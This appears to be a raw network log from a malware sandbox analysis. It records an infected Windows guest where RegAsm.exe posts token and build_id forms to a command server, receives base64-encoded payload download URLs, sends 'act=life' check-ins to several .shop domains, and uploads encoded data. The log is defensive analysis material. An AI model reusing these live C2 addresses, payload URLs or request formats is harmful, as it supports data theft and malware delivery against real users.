2024-09-26 22:15:01 UTC	16355	OUT	Data Raw: 74 49 52 51 41 6c 42 6f 6f 6f 30 47 4a 52 52 52 51 4d 53 6b 70 31 4a 69 69 34 43 55 6c 4f 78 54 54 51 4d 4b 53 6c 6f 6f 47 4e 4e 46 4c 53 55 44 44 74 53 55 75 4b 54 46 41 78 4b 53 6e 55 6d 4b 51 43 55 6c 4c 31 70 4b 42 69 64 36 54 74 54 71 51 69 67 6f 51 30 6c 4f 4e 49 52 51 4d 62 30 4e 46 4b 61 54 72 51 41 6e 57 6b 49 70 32 4d 55 30 69 67 6f 4b 51 38 69 6c 78 53 66 51 59 6f 41 4b 53 6c 78 7a 6d 69 67 59 32 69 6c 70 4f 2f 39 61 42 69 48 6b 55 48 6b 55 74 46 41 78 75 66 78 46 4a 30 70 78 37 30 33 48 46 41 77 2f 43 6a 72 2f 38 41 58 70 65 63 65 74 49 65 66 61 67 59 68 35 6f 78 6d 6c 2f 53 6b 78 6e 2f 41 41 6f 41 54 38 50 7a 6f 36 30 55 70 6f 47 4e 78 78 33 70 4f 31 4f 50 76 53 47 6d 41 6c 42 48 72 52 30 6f 50 74 53 47 4a 2f 6b 30 67 2f 47 6e 48 6d 6d 30 77 Data Ascii: tIRQAlBooo0GJRRRQMSkp1Jii4CUlOxTTQMKSlooGNNFLSUDDtSUuKTFAxKSnUmKQCUlL1pKBid6TtTqQigoQ0lONIRQMb0NFKaTrQAnWkIp2MU0igoKQ8ilxSfQYoAKSlxzmigY2ilpO/9aBiHkUHkUtFAxufxFJ0px703HFAw/Cjr/8AXpecetIefagYh5oxml/Skxn/AAoAT8Pzo60UpoGNxx3pO1OPvSGmAlBHrR0oPtSGJ/k0g/GnHmm0w
2024-09-26 22:15:01 UTC	16355	OUT	Data Raw: 43 57 4a 39 57 65 4d 2b 54 62 52 6e 64 35 53 6e 71 7a 66 79 2f 78 37 66 57 35 6a 6d 47 47 6f 34 57 63 35 53 54 56 6d 5a 34 58 44 56 70 56 6f 71 31 74 54 53 75 67 71 58 6b 79 4c 39 31 5a 47 41 2b 6d 61 77 50 45 67 42 73 49 6a 33 45 6f 48 36 47 74 63 73 53 53 53 63 6b 38 6d 75 66 38 41 45 63 34 4c 51 77 41 39 4d 75 33 39 50 36 31 2b 54 63 4d 78 6c 57 7a 69 6b 34 64 47 33 36 4b 7a 2f 77 43 47 50 71 4f 49 5a 78 70 5a 5a 55 35 75 71 53 2b 64 30 59 56 4a 7a 53 30 56 2b 31 6e 35 47 46 4e 38 4d 58 2f 39 6e 66 45 65 78 6c 4a 77 73 6b 71 77 74 2f 77 4e 64 76 38 41 4d 67 2f 68 54 71 35 33 55 4a 48 68 31 64 70 55 4a 56 30 5a 57 55 2b 68 41 46 5a 56 6f 4b 64 4e 78 66 55 39 54 4b 5a 63 75 49 35 75 79 2f 56 48 72 75 6d 61 66 42 6f 74 76 4a 34 61 6c 56 51 64 62 75 4c 34 Data Ascii: CWJ9WeM+TbRnd5Snqzfy/x7fW5jmGGo4Wc5STVmZ4XDVpVoq1tTSugqXkyL91ZGA+mawPEgBsIj3EoH6GtcsSSSck8muf8AEc4LQwA9Mu39P61+TcMxlWzik4dG36Kz/wCGPqOIZxpZZU5uqS+d0YVJzS0V+1n5GFN8MX/9nfEexlJwskqwt/wNdv8AMg/hTq53UJHh1dpUJV0ZWU+hAFZVoKdNxfU9TKZcuI5uy/VHrumafBotvJ4alVQdbuL4
2024-09-26 22:15:01 UTC	16355	OUT	Data Raw: 31 62 6a 47 49 70 57 51 59 39 69 52 57 2b 45 7a 43 4f 4a 6d 34 4a 57 30 75 63 65 50 79 69 65 43 70 4b 70 4b 53 64 33 62 38 2f 38 41 49 72 55 6c 4c 52 58 65 65 53 4a 53 34 6f 37 55 55 41 64 58 42 34 43 76 72 69 32 69 6e 53 37 74 67 73 69 42 77 44 75 7a 67 6a 50 70 54 2f 38 41 68 58 6d 6f 2f 77 44 50 35 61 2f 6d 33 2b 46 64 35 70 66 2f 41 43 43 4c 4c 2f 72 33 6a 2f 38 41 51 52 56 48 55 2f 46 57 68 36 52 4e 35 4e 37 71 4d 55 63 6f 36 6f 6f 4c 73 50 71 46 42 49 2f 47 76 6c 6f 59 2f 47 54 64 6f 75 37 39 46 2f 6b 66 65 7a 79 66 4c 6f 4b 38 6f 57 58 71 2f 77 44 4d 34 32 66 77 48 66 32 39 76 4c 4d 31 31 61 6c 59 30 4c 6b 41 74 6e 41 47 66 53 75 66 31 48 54 72 6a 53 37 78 72 61 35 54 44 4c 30 50 5a 68 36 69 76 53 6f 66 45 6d 69 36 39 62 7a 32 65 6e 36 6a 44 4a 50 Data Ascii: 1bjGIpWQY9iRW+EzCOJm4JW0ucePyieCpKpKSd3b8/8AIrUlLRXeeSJS4o7UUAdXB4Cvri2inS7tgsiBwDuzgjPpT/8AhXmo/wDP5a/m3+Fd5pf/ACCLL/r3j/8AQRVHU/FWh6RN5N7qMUco6ooLsPqFBI/GvloY/GTdou79F/kfezyfLoK8oWXq/wDM42fwHf29vLM11alY0LkAtnAGfSuf1HTrjS7xra5TDL0PZh6ivSofEmi69bz2en6jDJP
2024-09-26 22:15:01 UTC	16355	OUT	Data Raw: 7a 30 74 59 32 39 78 57 55 54 53 5a 6f 39 6c 46 68 79 6d 32 6d 70 32 4c 48 35 34 4a 56 2f 77 42 31 73 31 59 53 35 30 79 54 2f 6c 35 65 4d 2f 37 61 56 7a 52 6b 56 61 61 5a 2f 51 56 4c 6f 4c 75 48 73 32 39 6a 72 6c 68 74 35 44 69 47 2b 67 50 73 57 78 56 36 31 73 6e 74 31 6e 6b 5a 30 4b 2b 53 32 43 72 64 38 56 35 38 38 78 7a 54 56 75 5a 6b 7a 74 6b 64 63 38 59 42 72 4b 64 43 54 56 6c 49 62 77 38 6d 74 78 73 6e 33 6a 30 71 50 36 30 37 4f 63 65 6c 4e 50 70 2b 74 64 46 7a 72 53 30 45 4a 34 70 44 2b 4e 48 54 76 52 53 4b 51 32 67 38 48 74 51 54 67 30 55 46 41 66 63 34 70 76 53 6e 55 33 76 78 53 47 48 66 6d 67 6e 6a 2f 43 67 47 6b 50 50 76 53 41 54 38 71 54 50 31 50 76 53 30 6d 4b 43 67 2b 74 49 52 39 4b 58 72 2b 64 49 66 65 67 42 42 7a 37 65 39 46 41 48 4e 41 35 Data Ascii: z0tY29xWUTSZo9lFhym2mp2LH54JV/wB1s1YS50yT/l5eM/7aVzRkVaaZ/QVLoLuHs29jrlht5DiG+gPsWxV61snt1nkZ0K+S2Crd8V588xzTVuZkztkdc8YBrKdCTVlIbw8mtxsn3j0qP607OcelNPp+tdFzrS0EJ4pD+NHTvRSKQ2g8HtQTg0UFAfc4pvSnU3vxSGHfmgnj/CgGkPPvSAT8qTP1PvS0mKCg+tIR9KXr+dIfegBBz7e9FAHNA5
2024-09-26 22:15:01 UTC	16355	OUT	Data Raw: 4e 4c 53 55 44 43 69 69 67 30 41 4a 53 47 6c 70 4b 42 68 51 61 4b 44 51 4d 53 69 69 69 67 59 6c 42 6f 6f 4e 4d 42 44 53 55 74 49 61 42 68 53 55 70 70 4b 42 68 53 55 74 4a 51 41 55 47 69 6b 6f 47 46 4a 53 30 6c 4d 59 47 6b 6f 6f 6f 47 4a 52 52 33 6f 6f 41 53 6b 4e 4c 33 70 4b 42 68 53 55 70 70 4b 42 68 53 55 74 4a 51 4d 4b 53 69 6b 4e 41 77 70 4b 57 6b 6f 41 4b 51 30 74 4a 51 4d 44 53 55 55 68 6f 47 46 42 6f 6f 4e 41 78 4b 54 76 51 61 4b 42 69 55 55 55 55 44 45 6f 4e 46 42 6f 47 4a 53 55 47 69 6d 43 41 30 6c 4b 61 53 6b 4d 53 6b 70 61 53 67 6f 54 76 51 61 42 52 51 41 6c 4a 69 6c 70 4b 5a 51 64 71 53 6c 70 4b 41 45 6f 6f 70 4b 42 68 53 55 64 71 44 51 55 46 49 61 44 53 47 67 41 70 4b 57 6b 6f 47 46 4a 53 30 68 7a 53 47 68 4b 4b 4f 2f 4e 47 4d 30 79 68 4b 43 Data Ascii: NLSUDCiig0AJSGlpKBhQaKDQMSiiigYlBooNMBDSUtIaBhSUppKBhSUtJQAUGikoGFJS0lMYGkoooGJRR3ooASkNL3pKBhSUppKBhSUtJQMKSikNAwpKWkoAKQ0tJQMDSUUhoGFBooNAxKTvQaKBiUUUUDEoNFBoGJSUGimCA0lKaSkMSkpaSgoTvQaBRQAlJilpKZQdqSlpKAEoopKBhSUdqDQUFIaDSGgApKWkoGFJS0hzSGhKKO/NGM0yhKC
2024-09-26 22:15:01 UTC	607	OUT	Data Raw: 6a 4a 4e 63 4a 43 75 71 36 62 44 70 47 68 36 4e 64 66 59 37 31 59 48 31 4b 2b 75 51 32 33 37 50 76 54 68 69 77 79 56 32 51 34 4f 52 7a 38 37 41 63 6e 6e 6b 31 31 76 56 6c 73 70 72 49 61 6e 65 66 59 35 33 38 79 61 33 38 39 76 4c 6b 62 49 4f 35 6c 7a 68 6a 6b 44 6b 6a 74 54 6c 38 51 61 78 48 71 38 32 71 77 36 6c 64 51 58 38 78 4f 2b 34 74 35 54 45 78 7a 31 48 79 34 77 4f 6e 41 34 34 46 46 67 75 65 6e 51 61 37 4e 64 6d 50 55 74 42 6e 75 4a 4c 69 62 57 72 4b 77 75 4c 6e 61 56 6b 76 49 31 68 78 6d 51 64 78 49 77 59 6b 48 72 67 5a 35 46 5a 64 39 4c 4e 59 32 32 71 61 4a 63 61 6c 48 48 59 61 6e 4d 31 74 70 46 68 4c 4a 74 67 68 69 2b 30 45 2f 61 57 2f 68 51 44 61 77 44 66 65 4f 53 65 6e 4a 34 6b 2b 4b 50 45 44 58 4d 31 79 32 75 36 6d 62 69 61 50 79 70 5a 54 64 79 Data Ascii: jJNcJCuq6bDpGh6NdfY71YH1K+uQ237PvThiwyV2Q4ORz87Acnnk11vVlsprIanefY538ya389vLkbIO5lzhjkDkjtTl8QaxHq82qw6ldQX8xO+4t5TExz1Hy4wOnA44FFguenQa7NdmPUtBnuJLibWrKwuLnaVkvI1hxmQdxIwYkHrgZ5FZd9LNY22qaJcalHHYanM1tpFhLJtghi+0E/aW/hQDawDfeOSenJ4k+KPEDXM1y2u6mbiaPypZTdy
2024-09-26 22:15:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49763	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:03 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:03 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HIIEBAFCBKFIDGCAKKKFCont
2024-09-26 22:15:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:05 UTC	280	IN	Data Raw: 31 30 63 0d 0a 4d 54 49 79 4d 44 55 33 4e 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 6a 56 6b 59 6d 46 6a 59 54 4d 30 59 57 4e 66 62 47 5a 6b 62 6e 4e 68 5a 6d 35 6b 63 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 44 45 79 4d 6a 41 31 4e 7a 64 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 59 31 5a 47 49 35 5a 54 55 30 4e 7a 6b 30 58 33 5a 6d 61 32 46 6e 61 33 4d 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 49 77 4e 54 63 34 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 4e 57 51 35 59 57 49 77 5a 44 52 6a 4e 31 39 79 5a 48 Data Ascii: 10cMTIyMDU3NnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZjVkYmFjYTM0YWNfbGZkbnNhZm5kcy5leGV8MXxra2trfDEyMjA1Nzd8aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmY1ZGI5ZTU0Nzk0X3Zma2Fna3MuZXhlfDF8a2tra3wxMjIwNTc4fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmNWQ5YWIwZDRjN19yZH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49766	104.21.36.139	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:07 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: wallkedsleeoi.shop
2024-09-26 22:15:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:08 UTC	782	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iu42ri28c519topkhkq0vdob8h; expires=Mon, 20 Jan 2025 16:01:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=glI76XA6lC7PCT%2FneKkSj9AGbCTIpmCbM%2FWfLOAlUORbPlx9p%2BXchAB7UT%2FErNiQl01DMQFUM1FV7MgyuE9Jo%2FplU9YKY%2B0Cf7raX0uzir49EwZYCS7u%2BCbcw7c1mO6Gv7z%2FmVo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c6188561774-EWR
2024-09-26 22:15:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49765	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:07 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:07 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------HDHCFIJEGCAKJJKEHJJECont
2024-09-26 22:15:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49767	104.21.4.136	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:08 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 22:15:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:09 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j1ttp21kcrk087efap6vel63j9; expires=Mon, 20 Jan 2025 16:01:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2rJu55tBz2rJKspXP4q%2FNYQX%2BZNdmtsG7kMfEgThP1lzIGZOjFata3f4Nr91imZ18A2nPEP6jEx%2FV14yGyymBl5VpdxC647n1W4Gu2OiMmogdrIfERJnnutFlfcpZb5GnM3nKg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c6798d472bc-EWR
2024-09-26 22:15:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49768	188.114.97.3	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:09 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 22:15:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:10 UTC	782	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pnj7htelf6jjkiek837uak5m8l; expires=Mon, 20 Jan 2025 16:01:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=npauBt6xZDPEFi%2BjbQ%2FbU6z%2BqF6Je4aBU%2BG6VBpQam0EM1%2BJdoI4oe9mv9Jgs6dLoUyN18mDdoCps41BGfkxNNxxhuTMnKj5kEQ1O4pupjUYp%2B835Ey%2BIwlr4kigaoQvT6zUlA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c6d6d664379-EWR
2024-09-26 22:15:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49769	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:09 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:09 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GIEHJKEBAAEBGCAAEBFHCont
2024-09-26 22:15:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49770	188.114.96.3	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:10 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 22:15:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:11 UTC	768	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tkohvba6q9nqq6q8h6rke9icvr; expires=Mon, 20 Jan 2025 16:01:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfWVKL9xCrsNWLHwFW0UZlYuAnGedIF3thEhUB8QDBZCF%2BzmzQ%2FHrGnAYWO07zuonaXmmpoWm9w9VzkY9GGDWb7Bw83UwMK3c34J55OZBJrpnu3C0JQtmAJRlctnv5oOhoa0nqSY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c74c9b732d0-EWR
2024-09-26 22:15:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49771	188.114.97.3	443	1220	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:12 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 22:15:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:12 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q7moi7eig0ak6q3r11jjr11efq; expires=Mon, 20 Jan 2025 16:01:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OTWhk%2BoNAnu2hzIJyXYtXSRl52uH0gJiKfPbyrOOWhsq60%2FISjkUjATFjrV0bmorinEv%2F488nG1gp0xO1uYDw7kn2FUGxxnpn3t37u6wt6TfgwpU96nVGTYjqnOmdy7nzX8b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c7c9a3b43da-EWR
2024-09-26 22:15:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49772	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

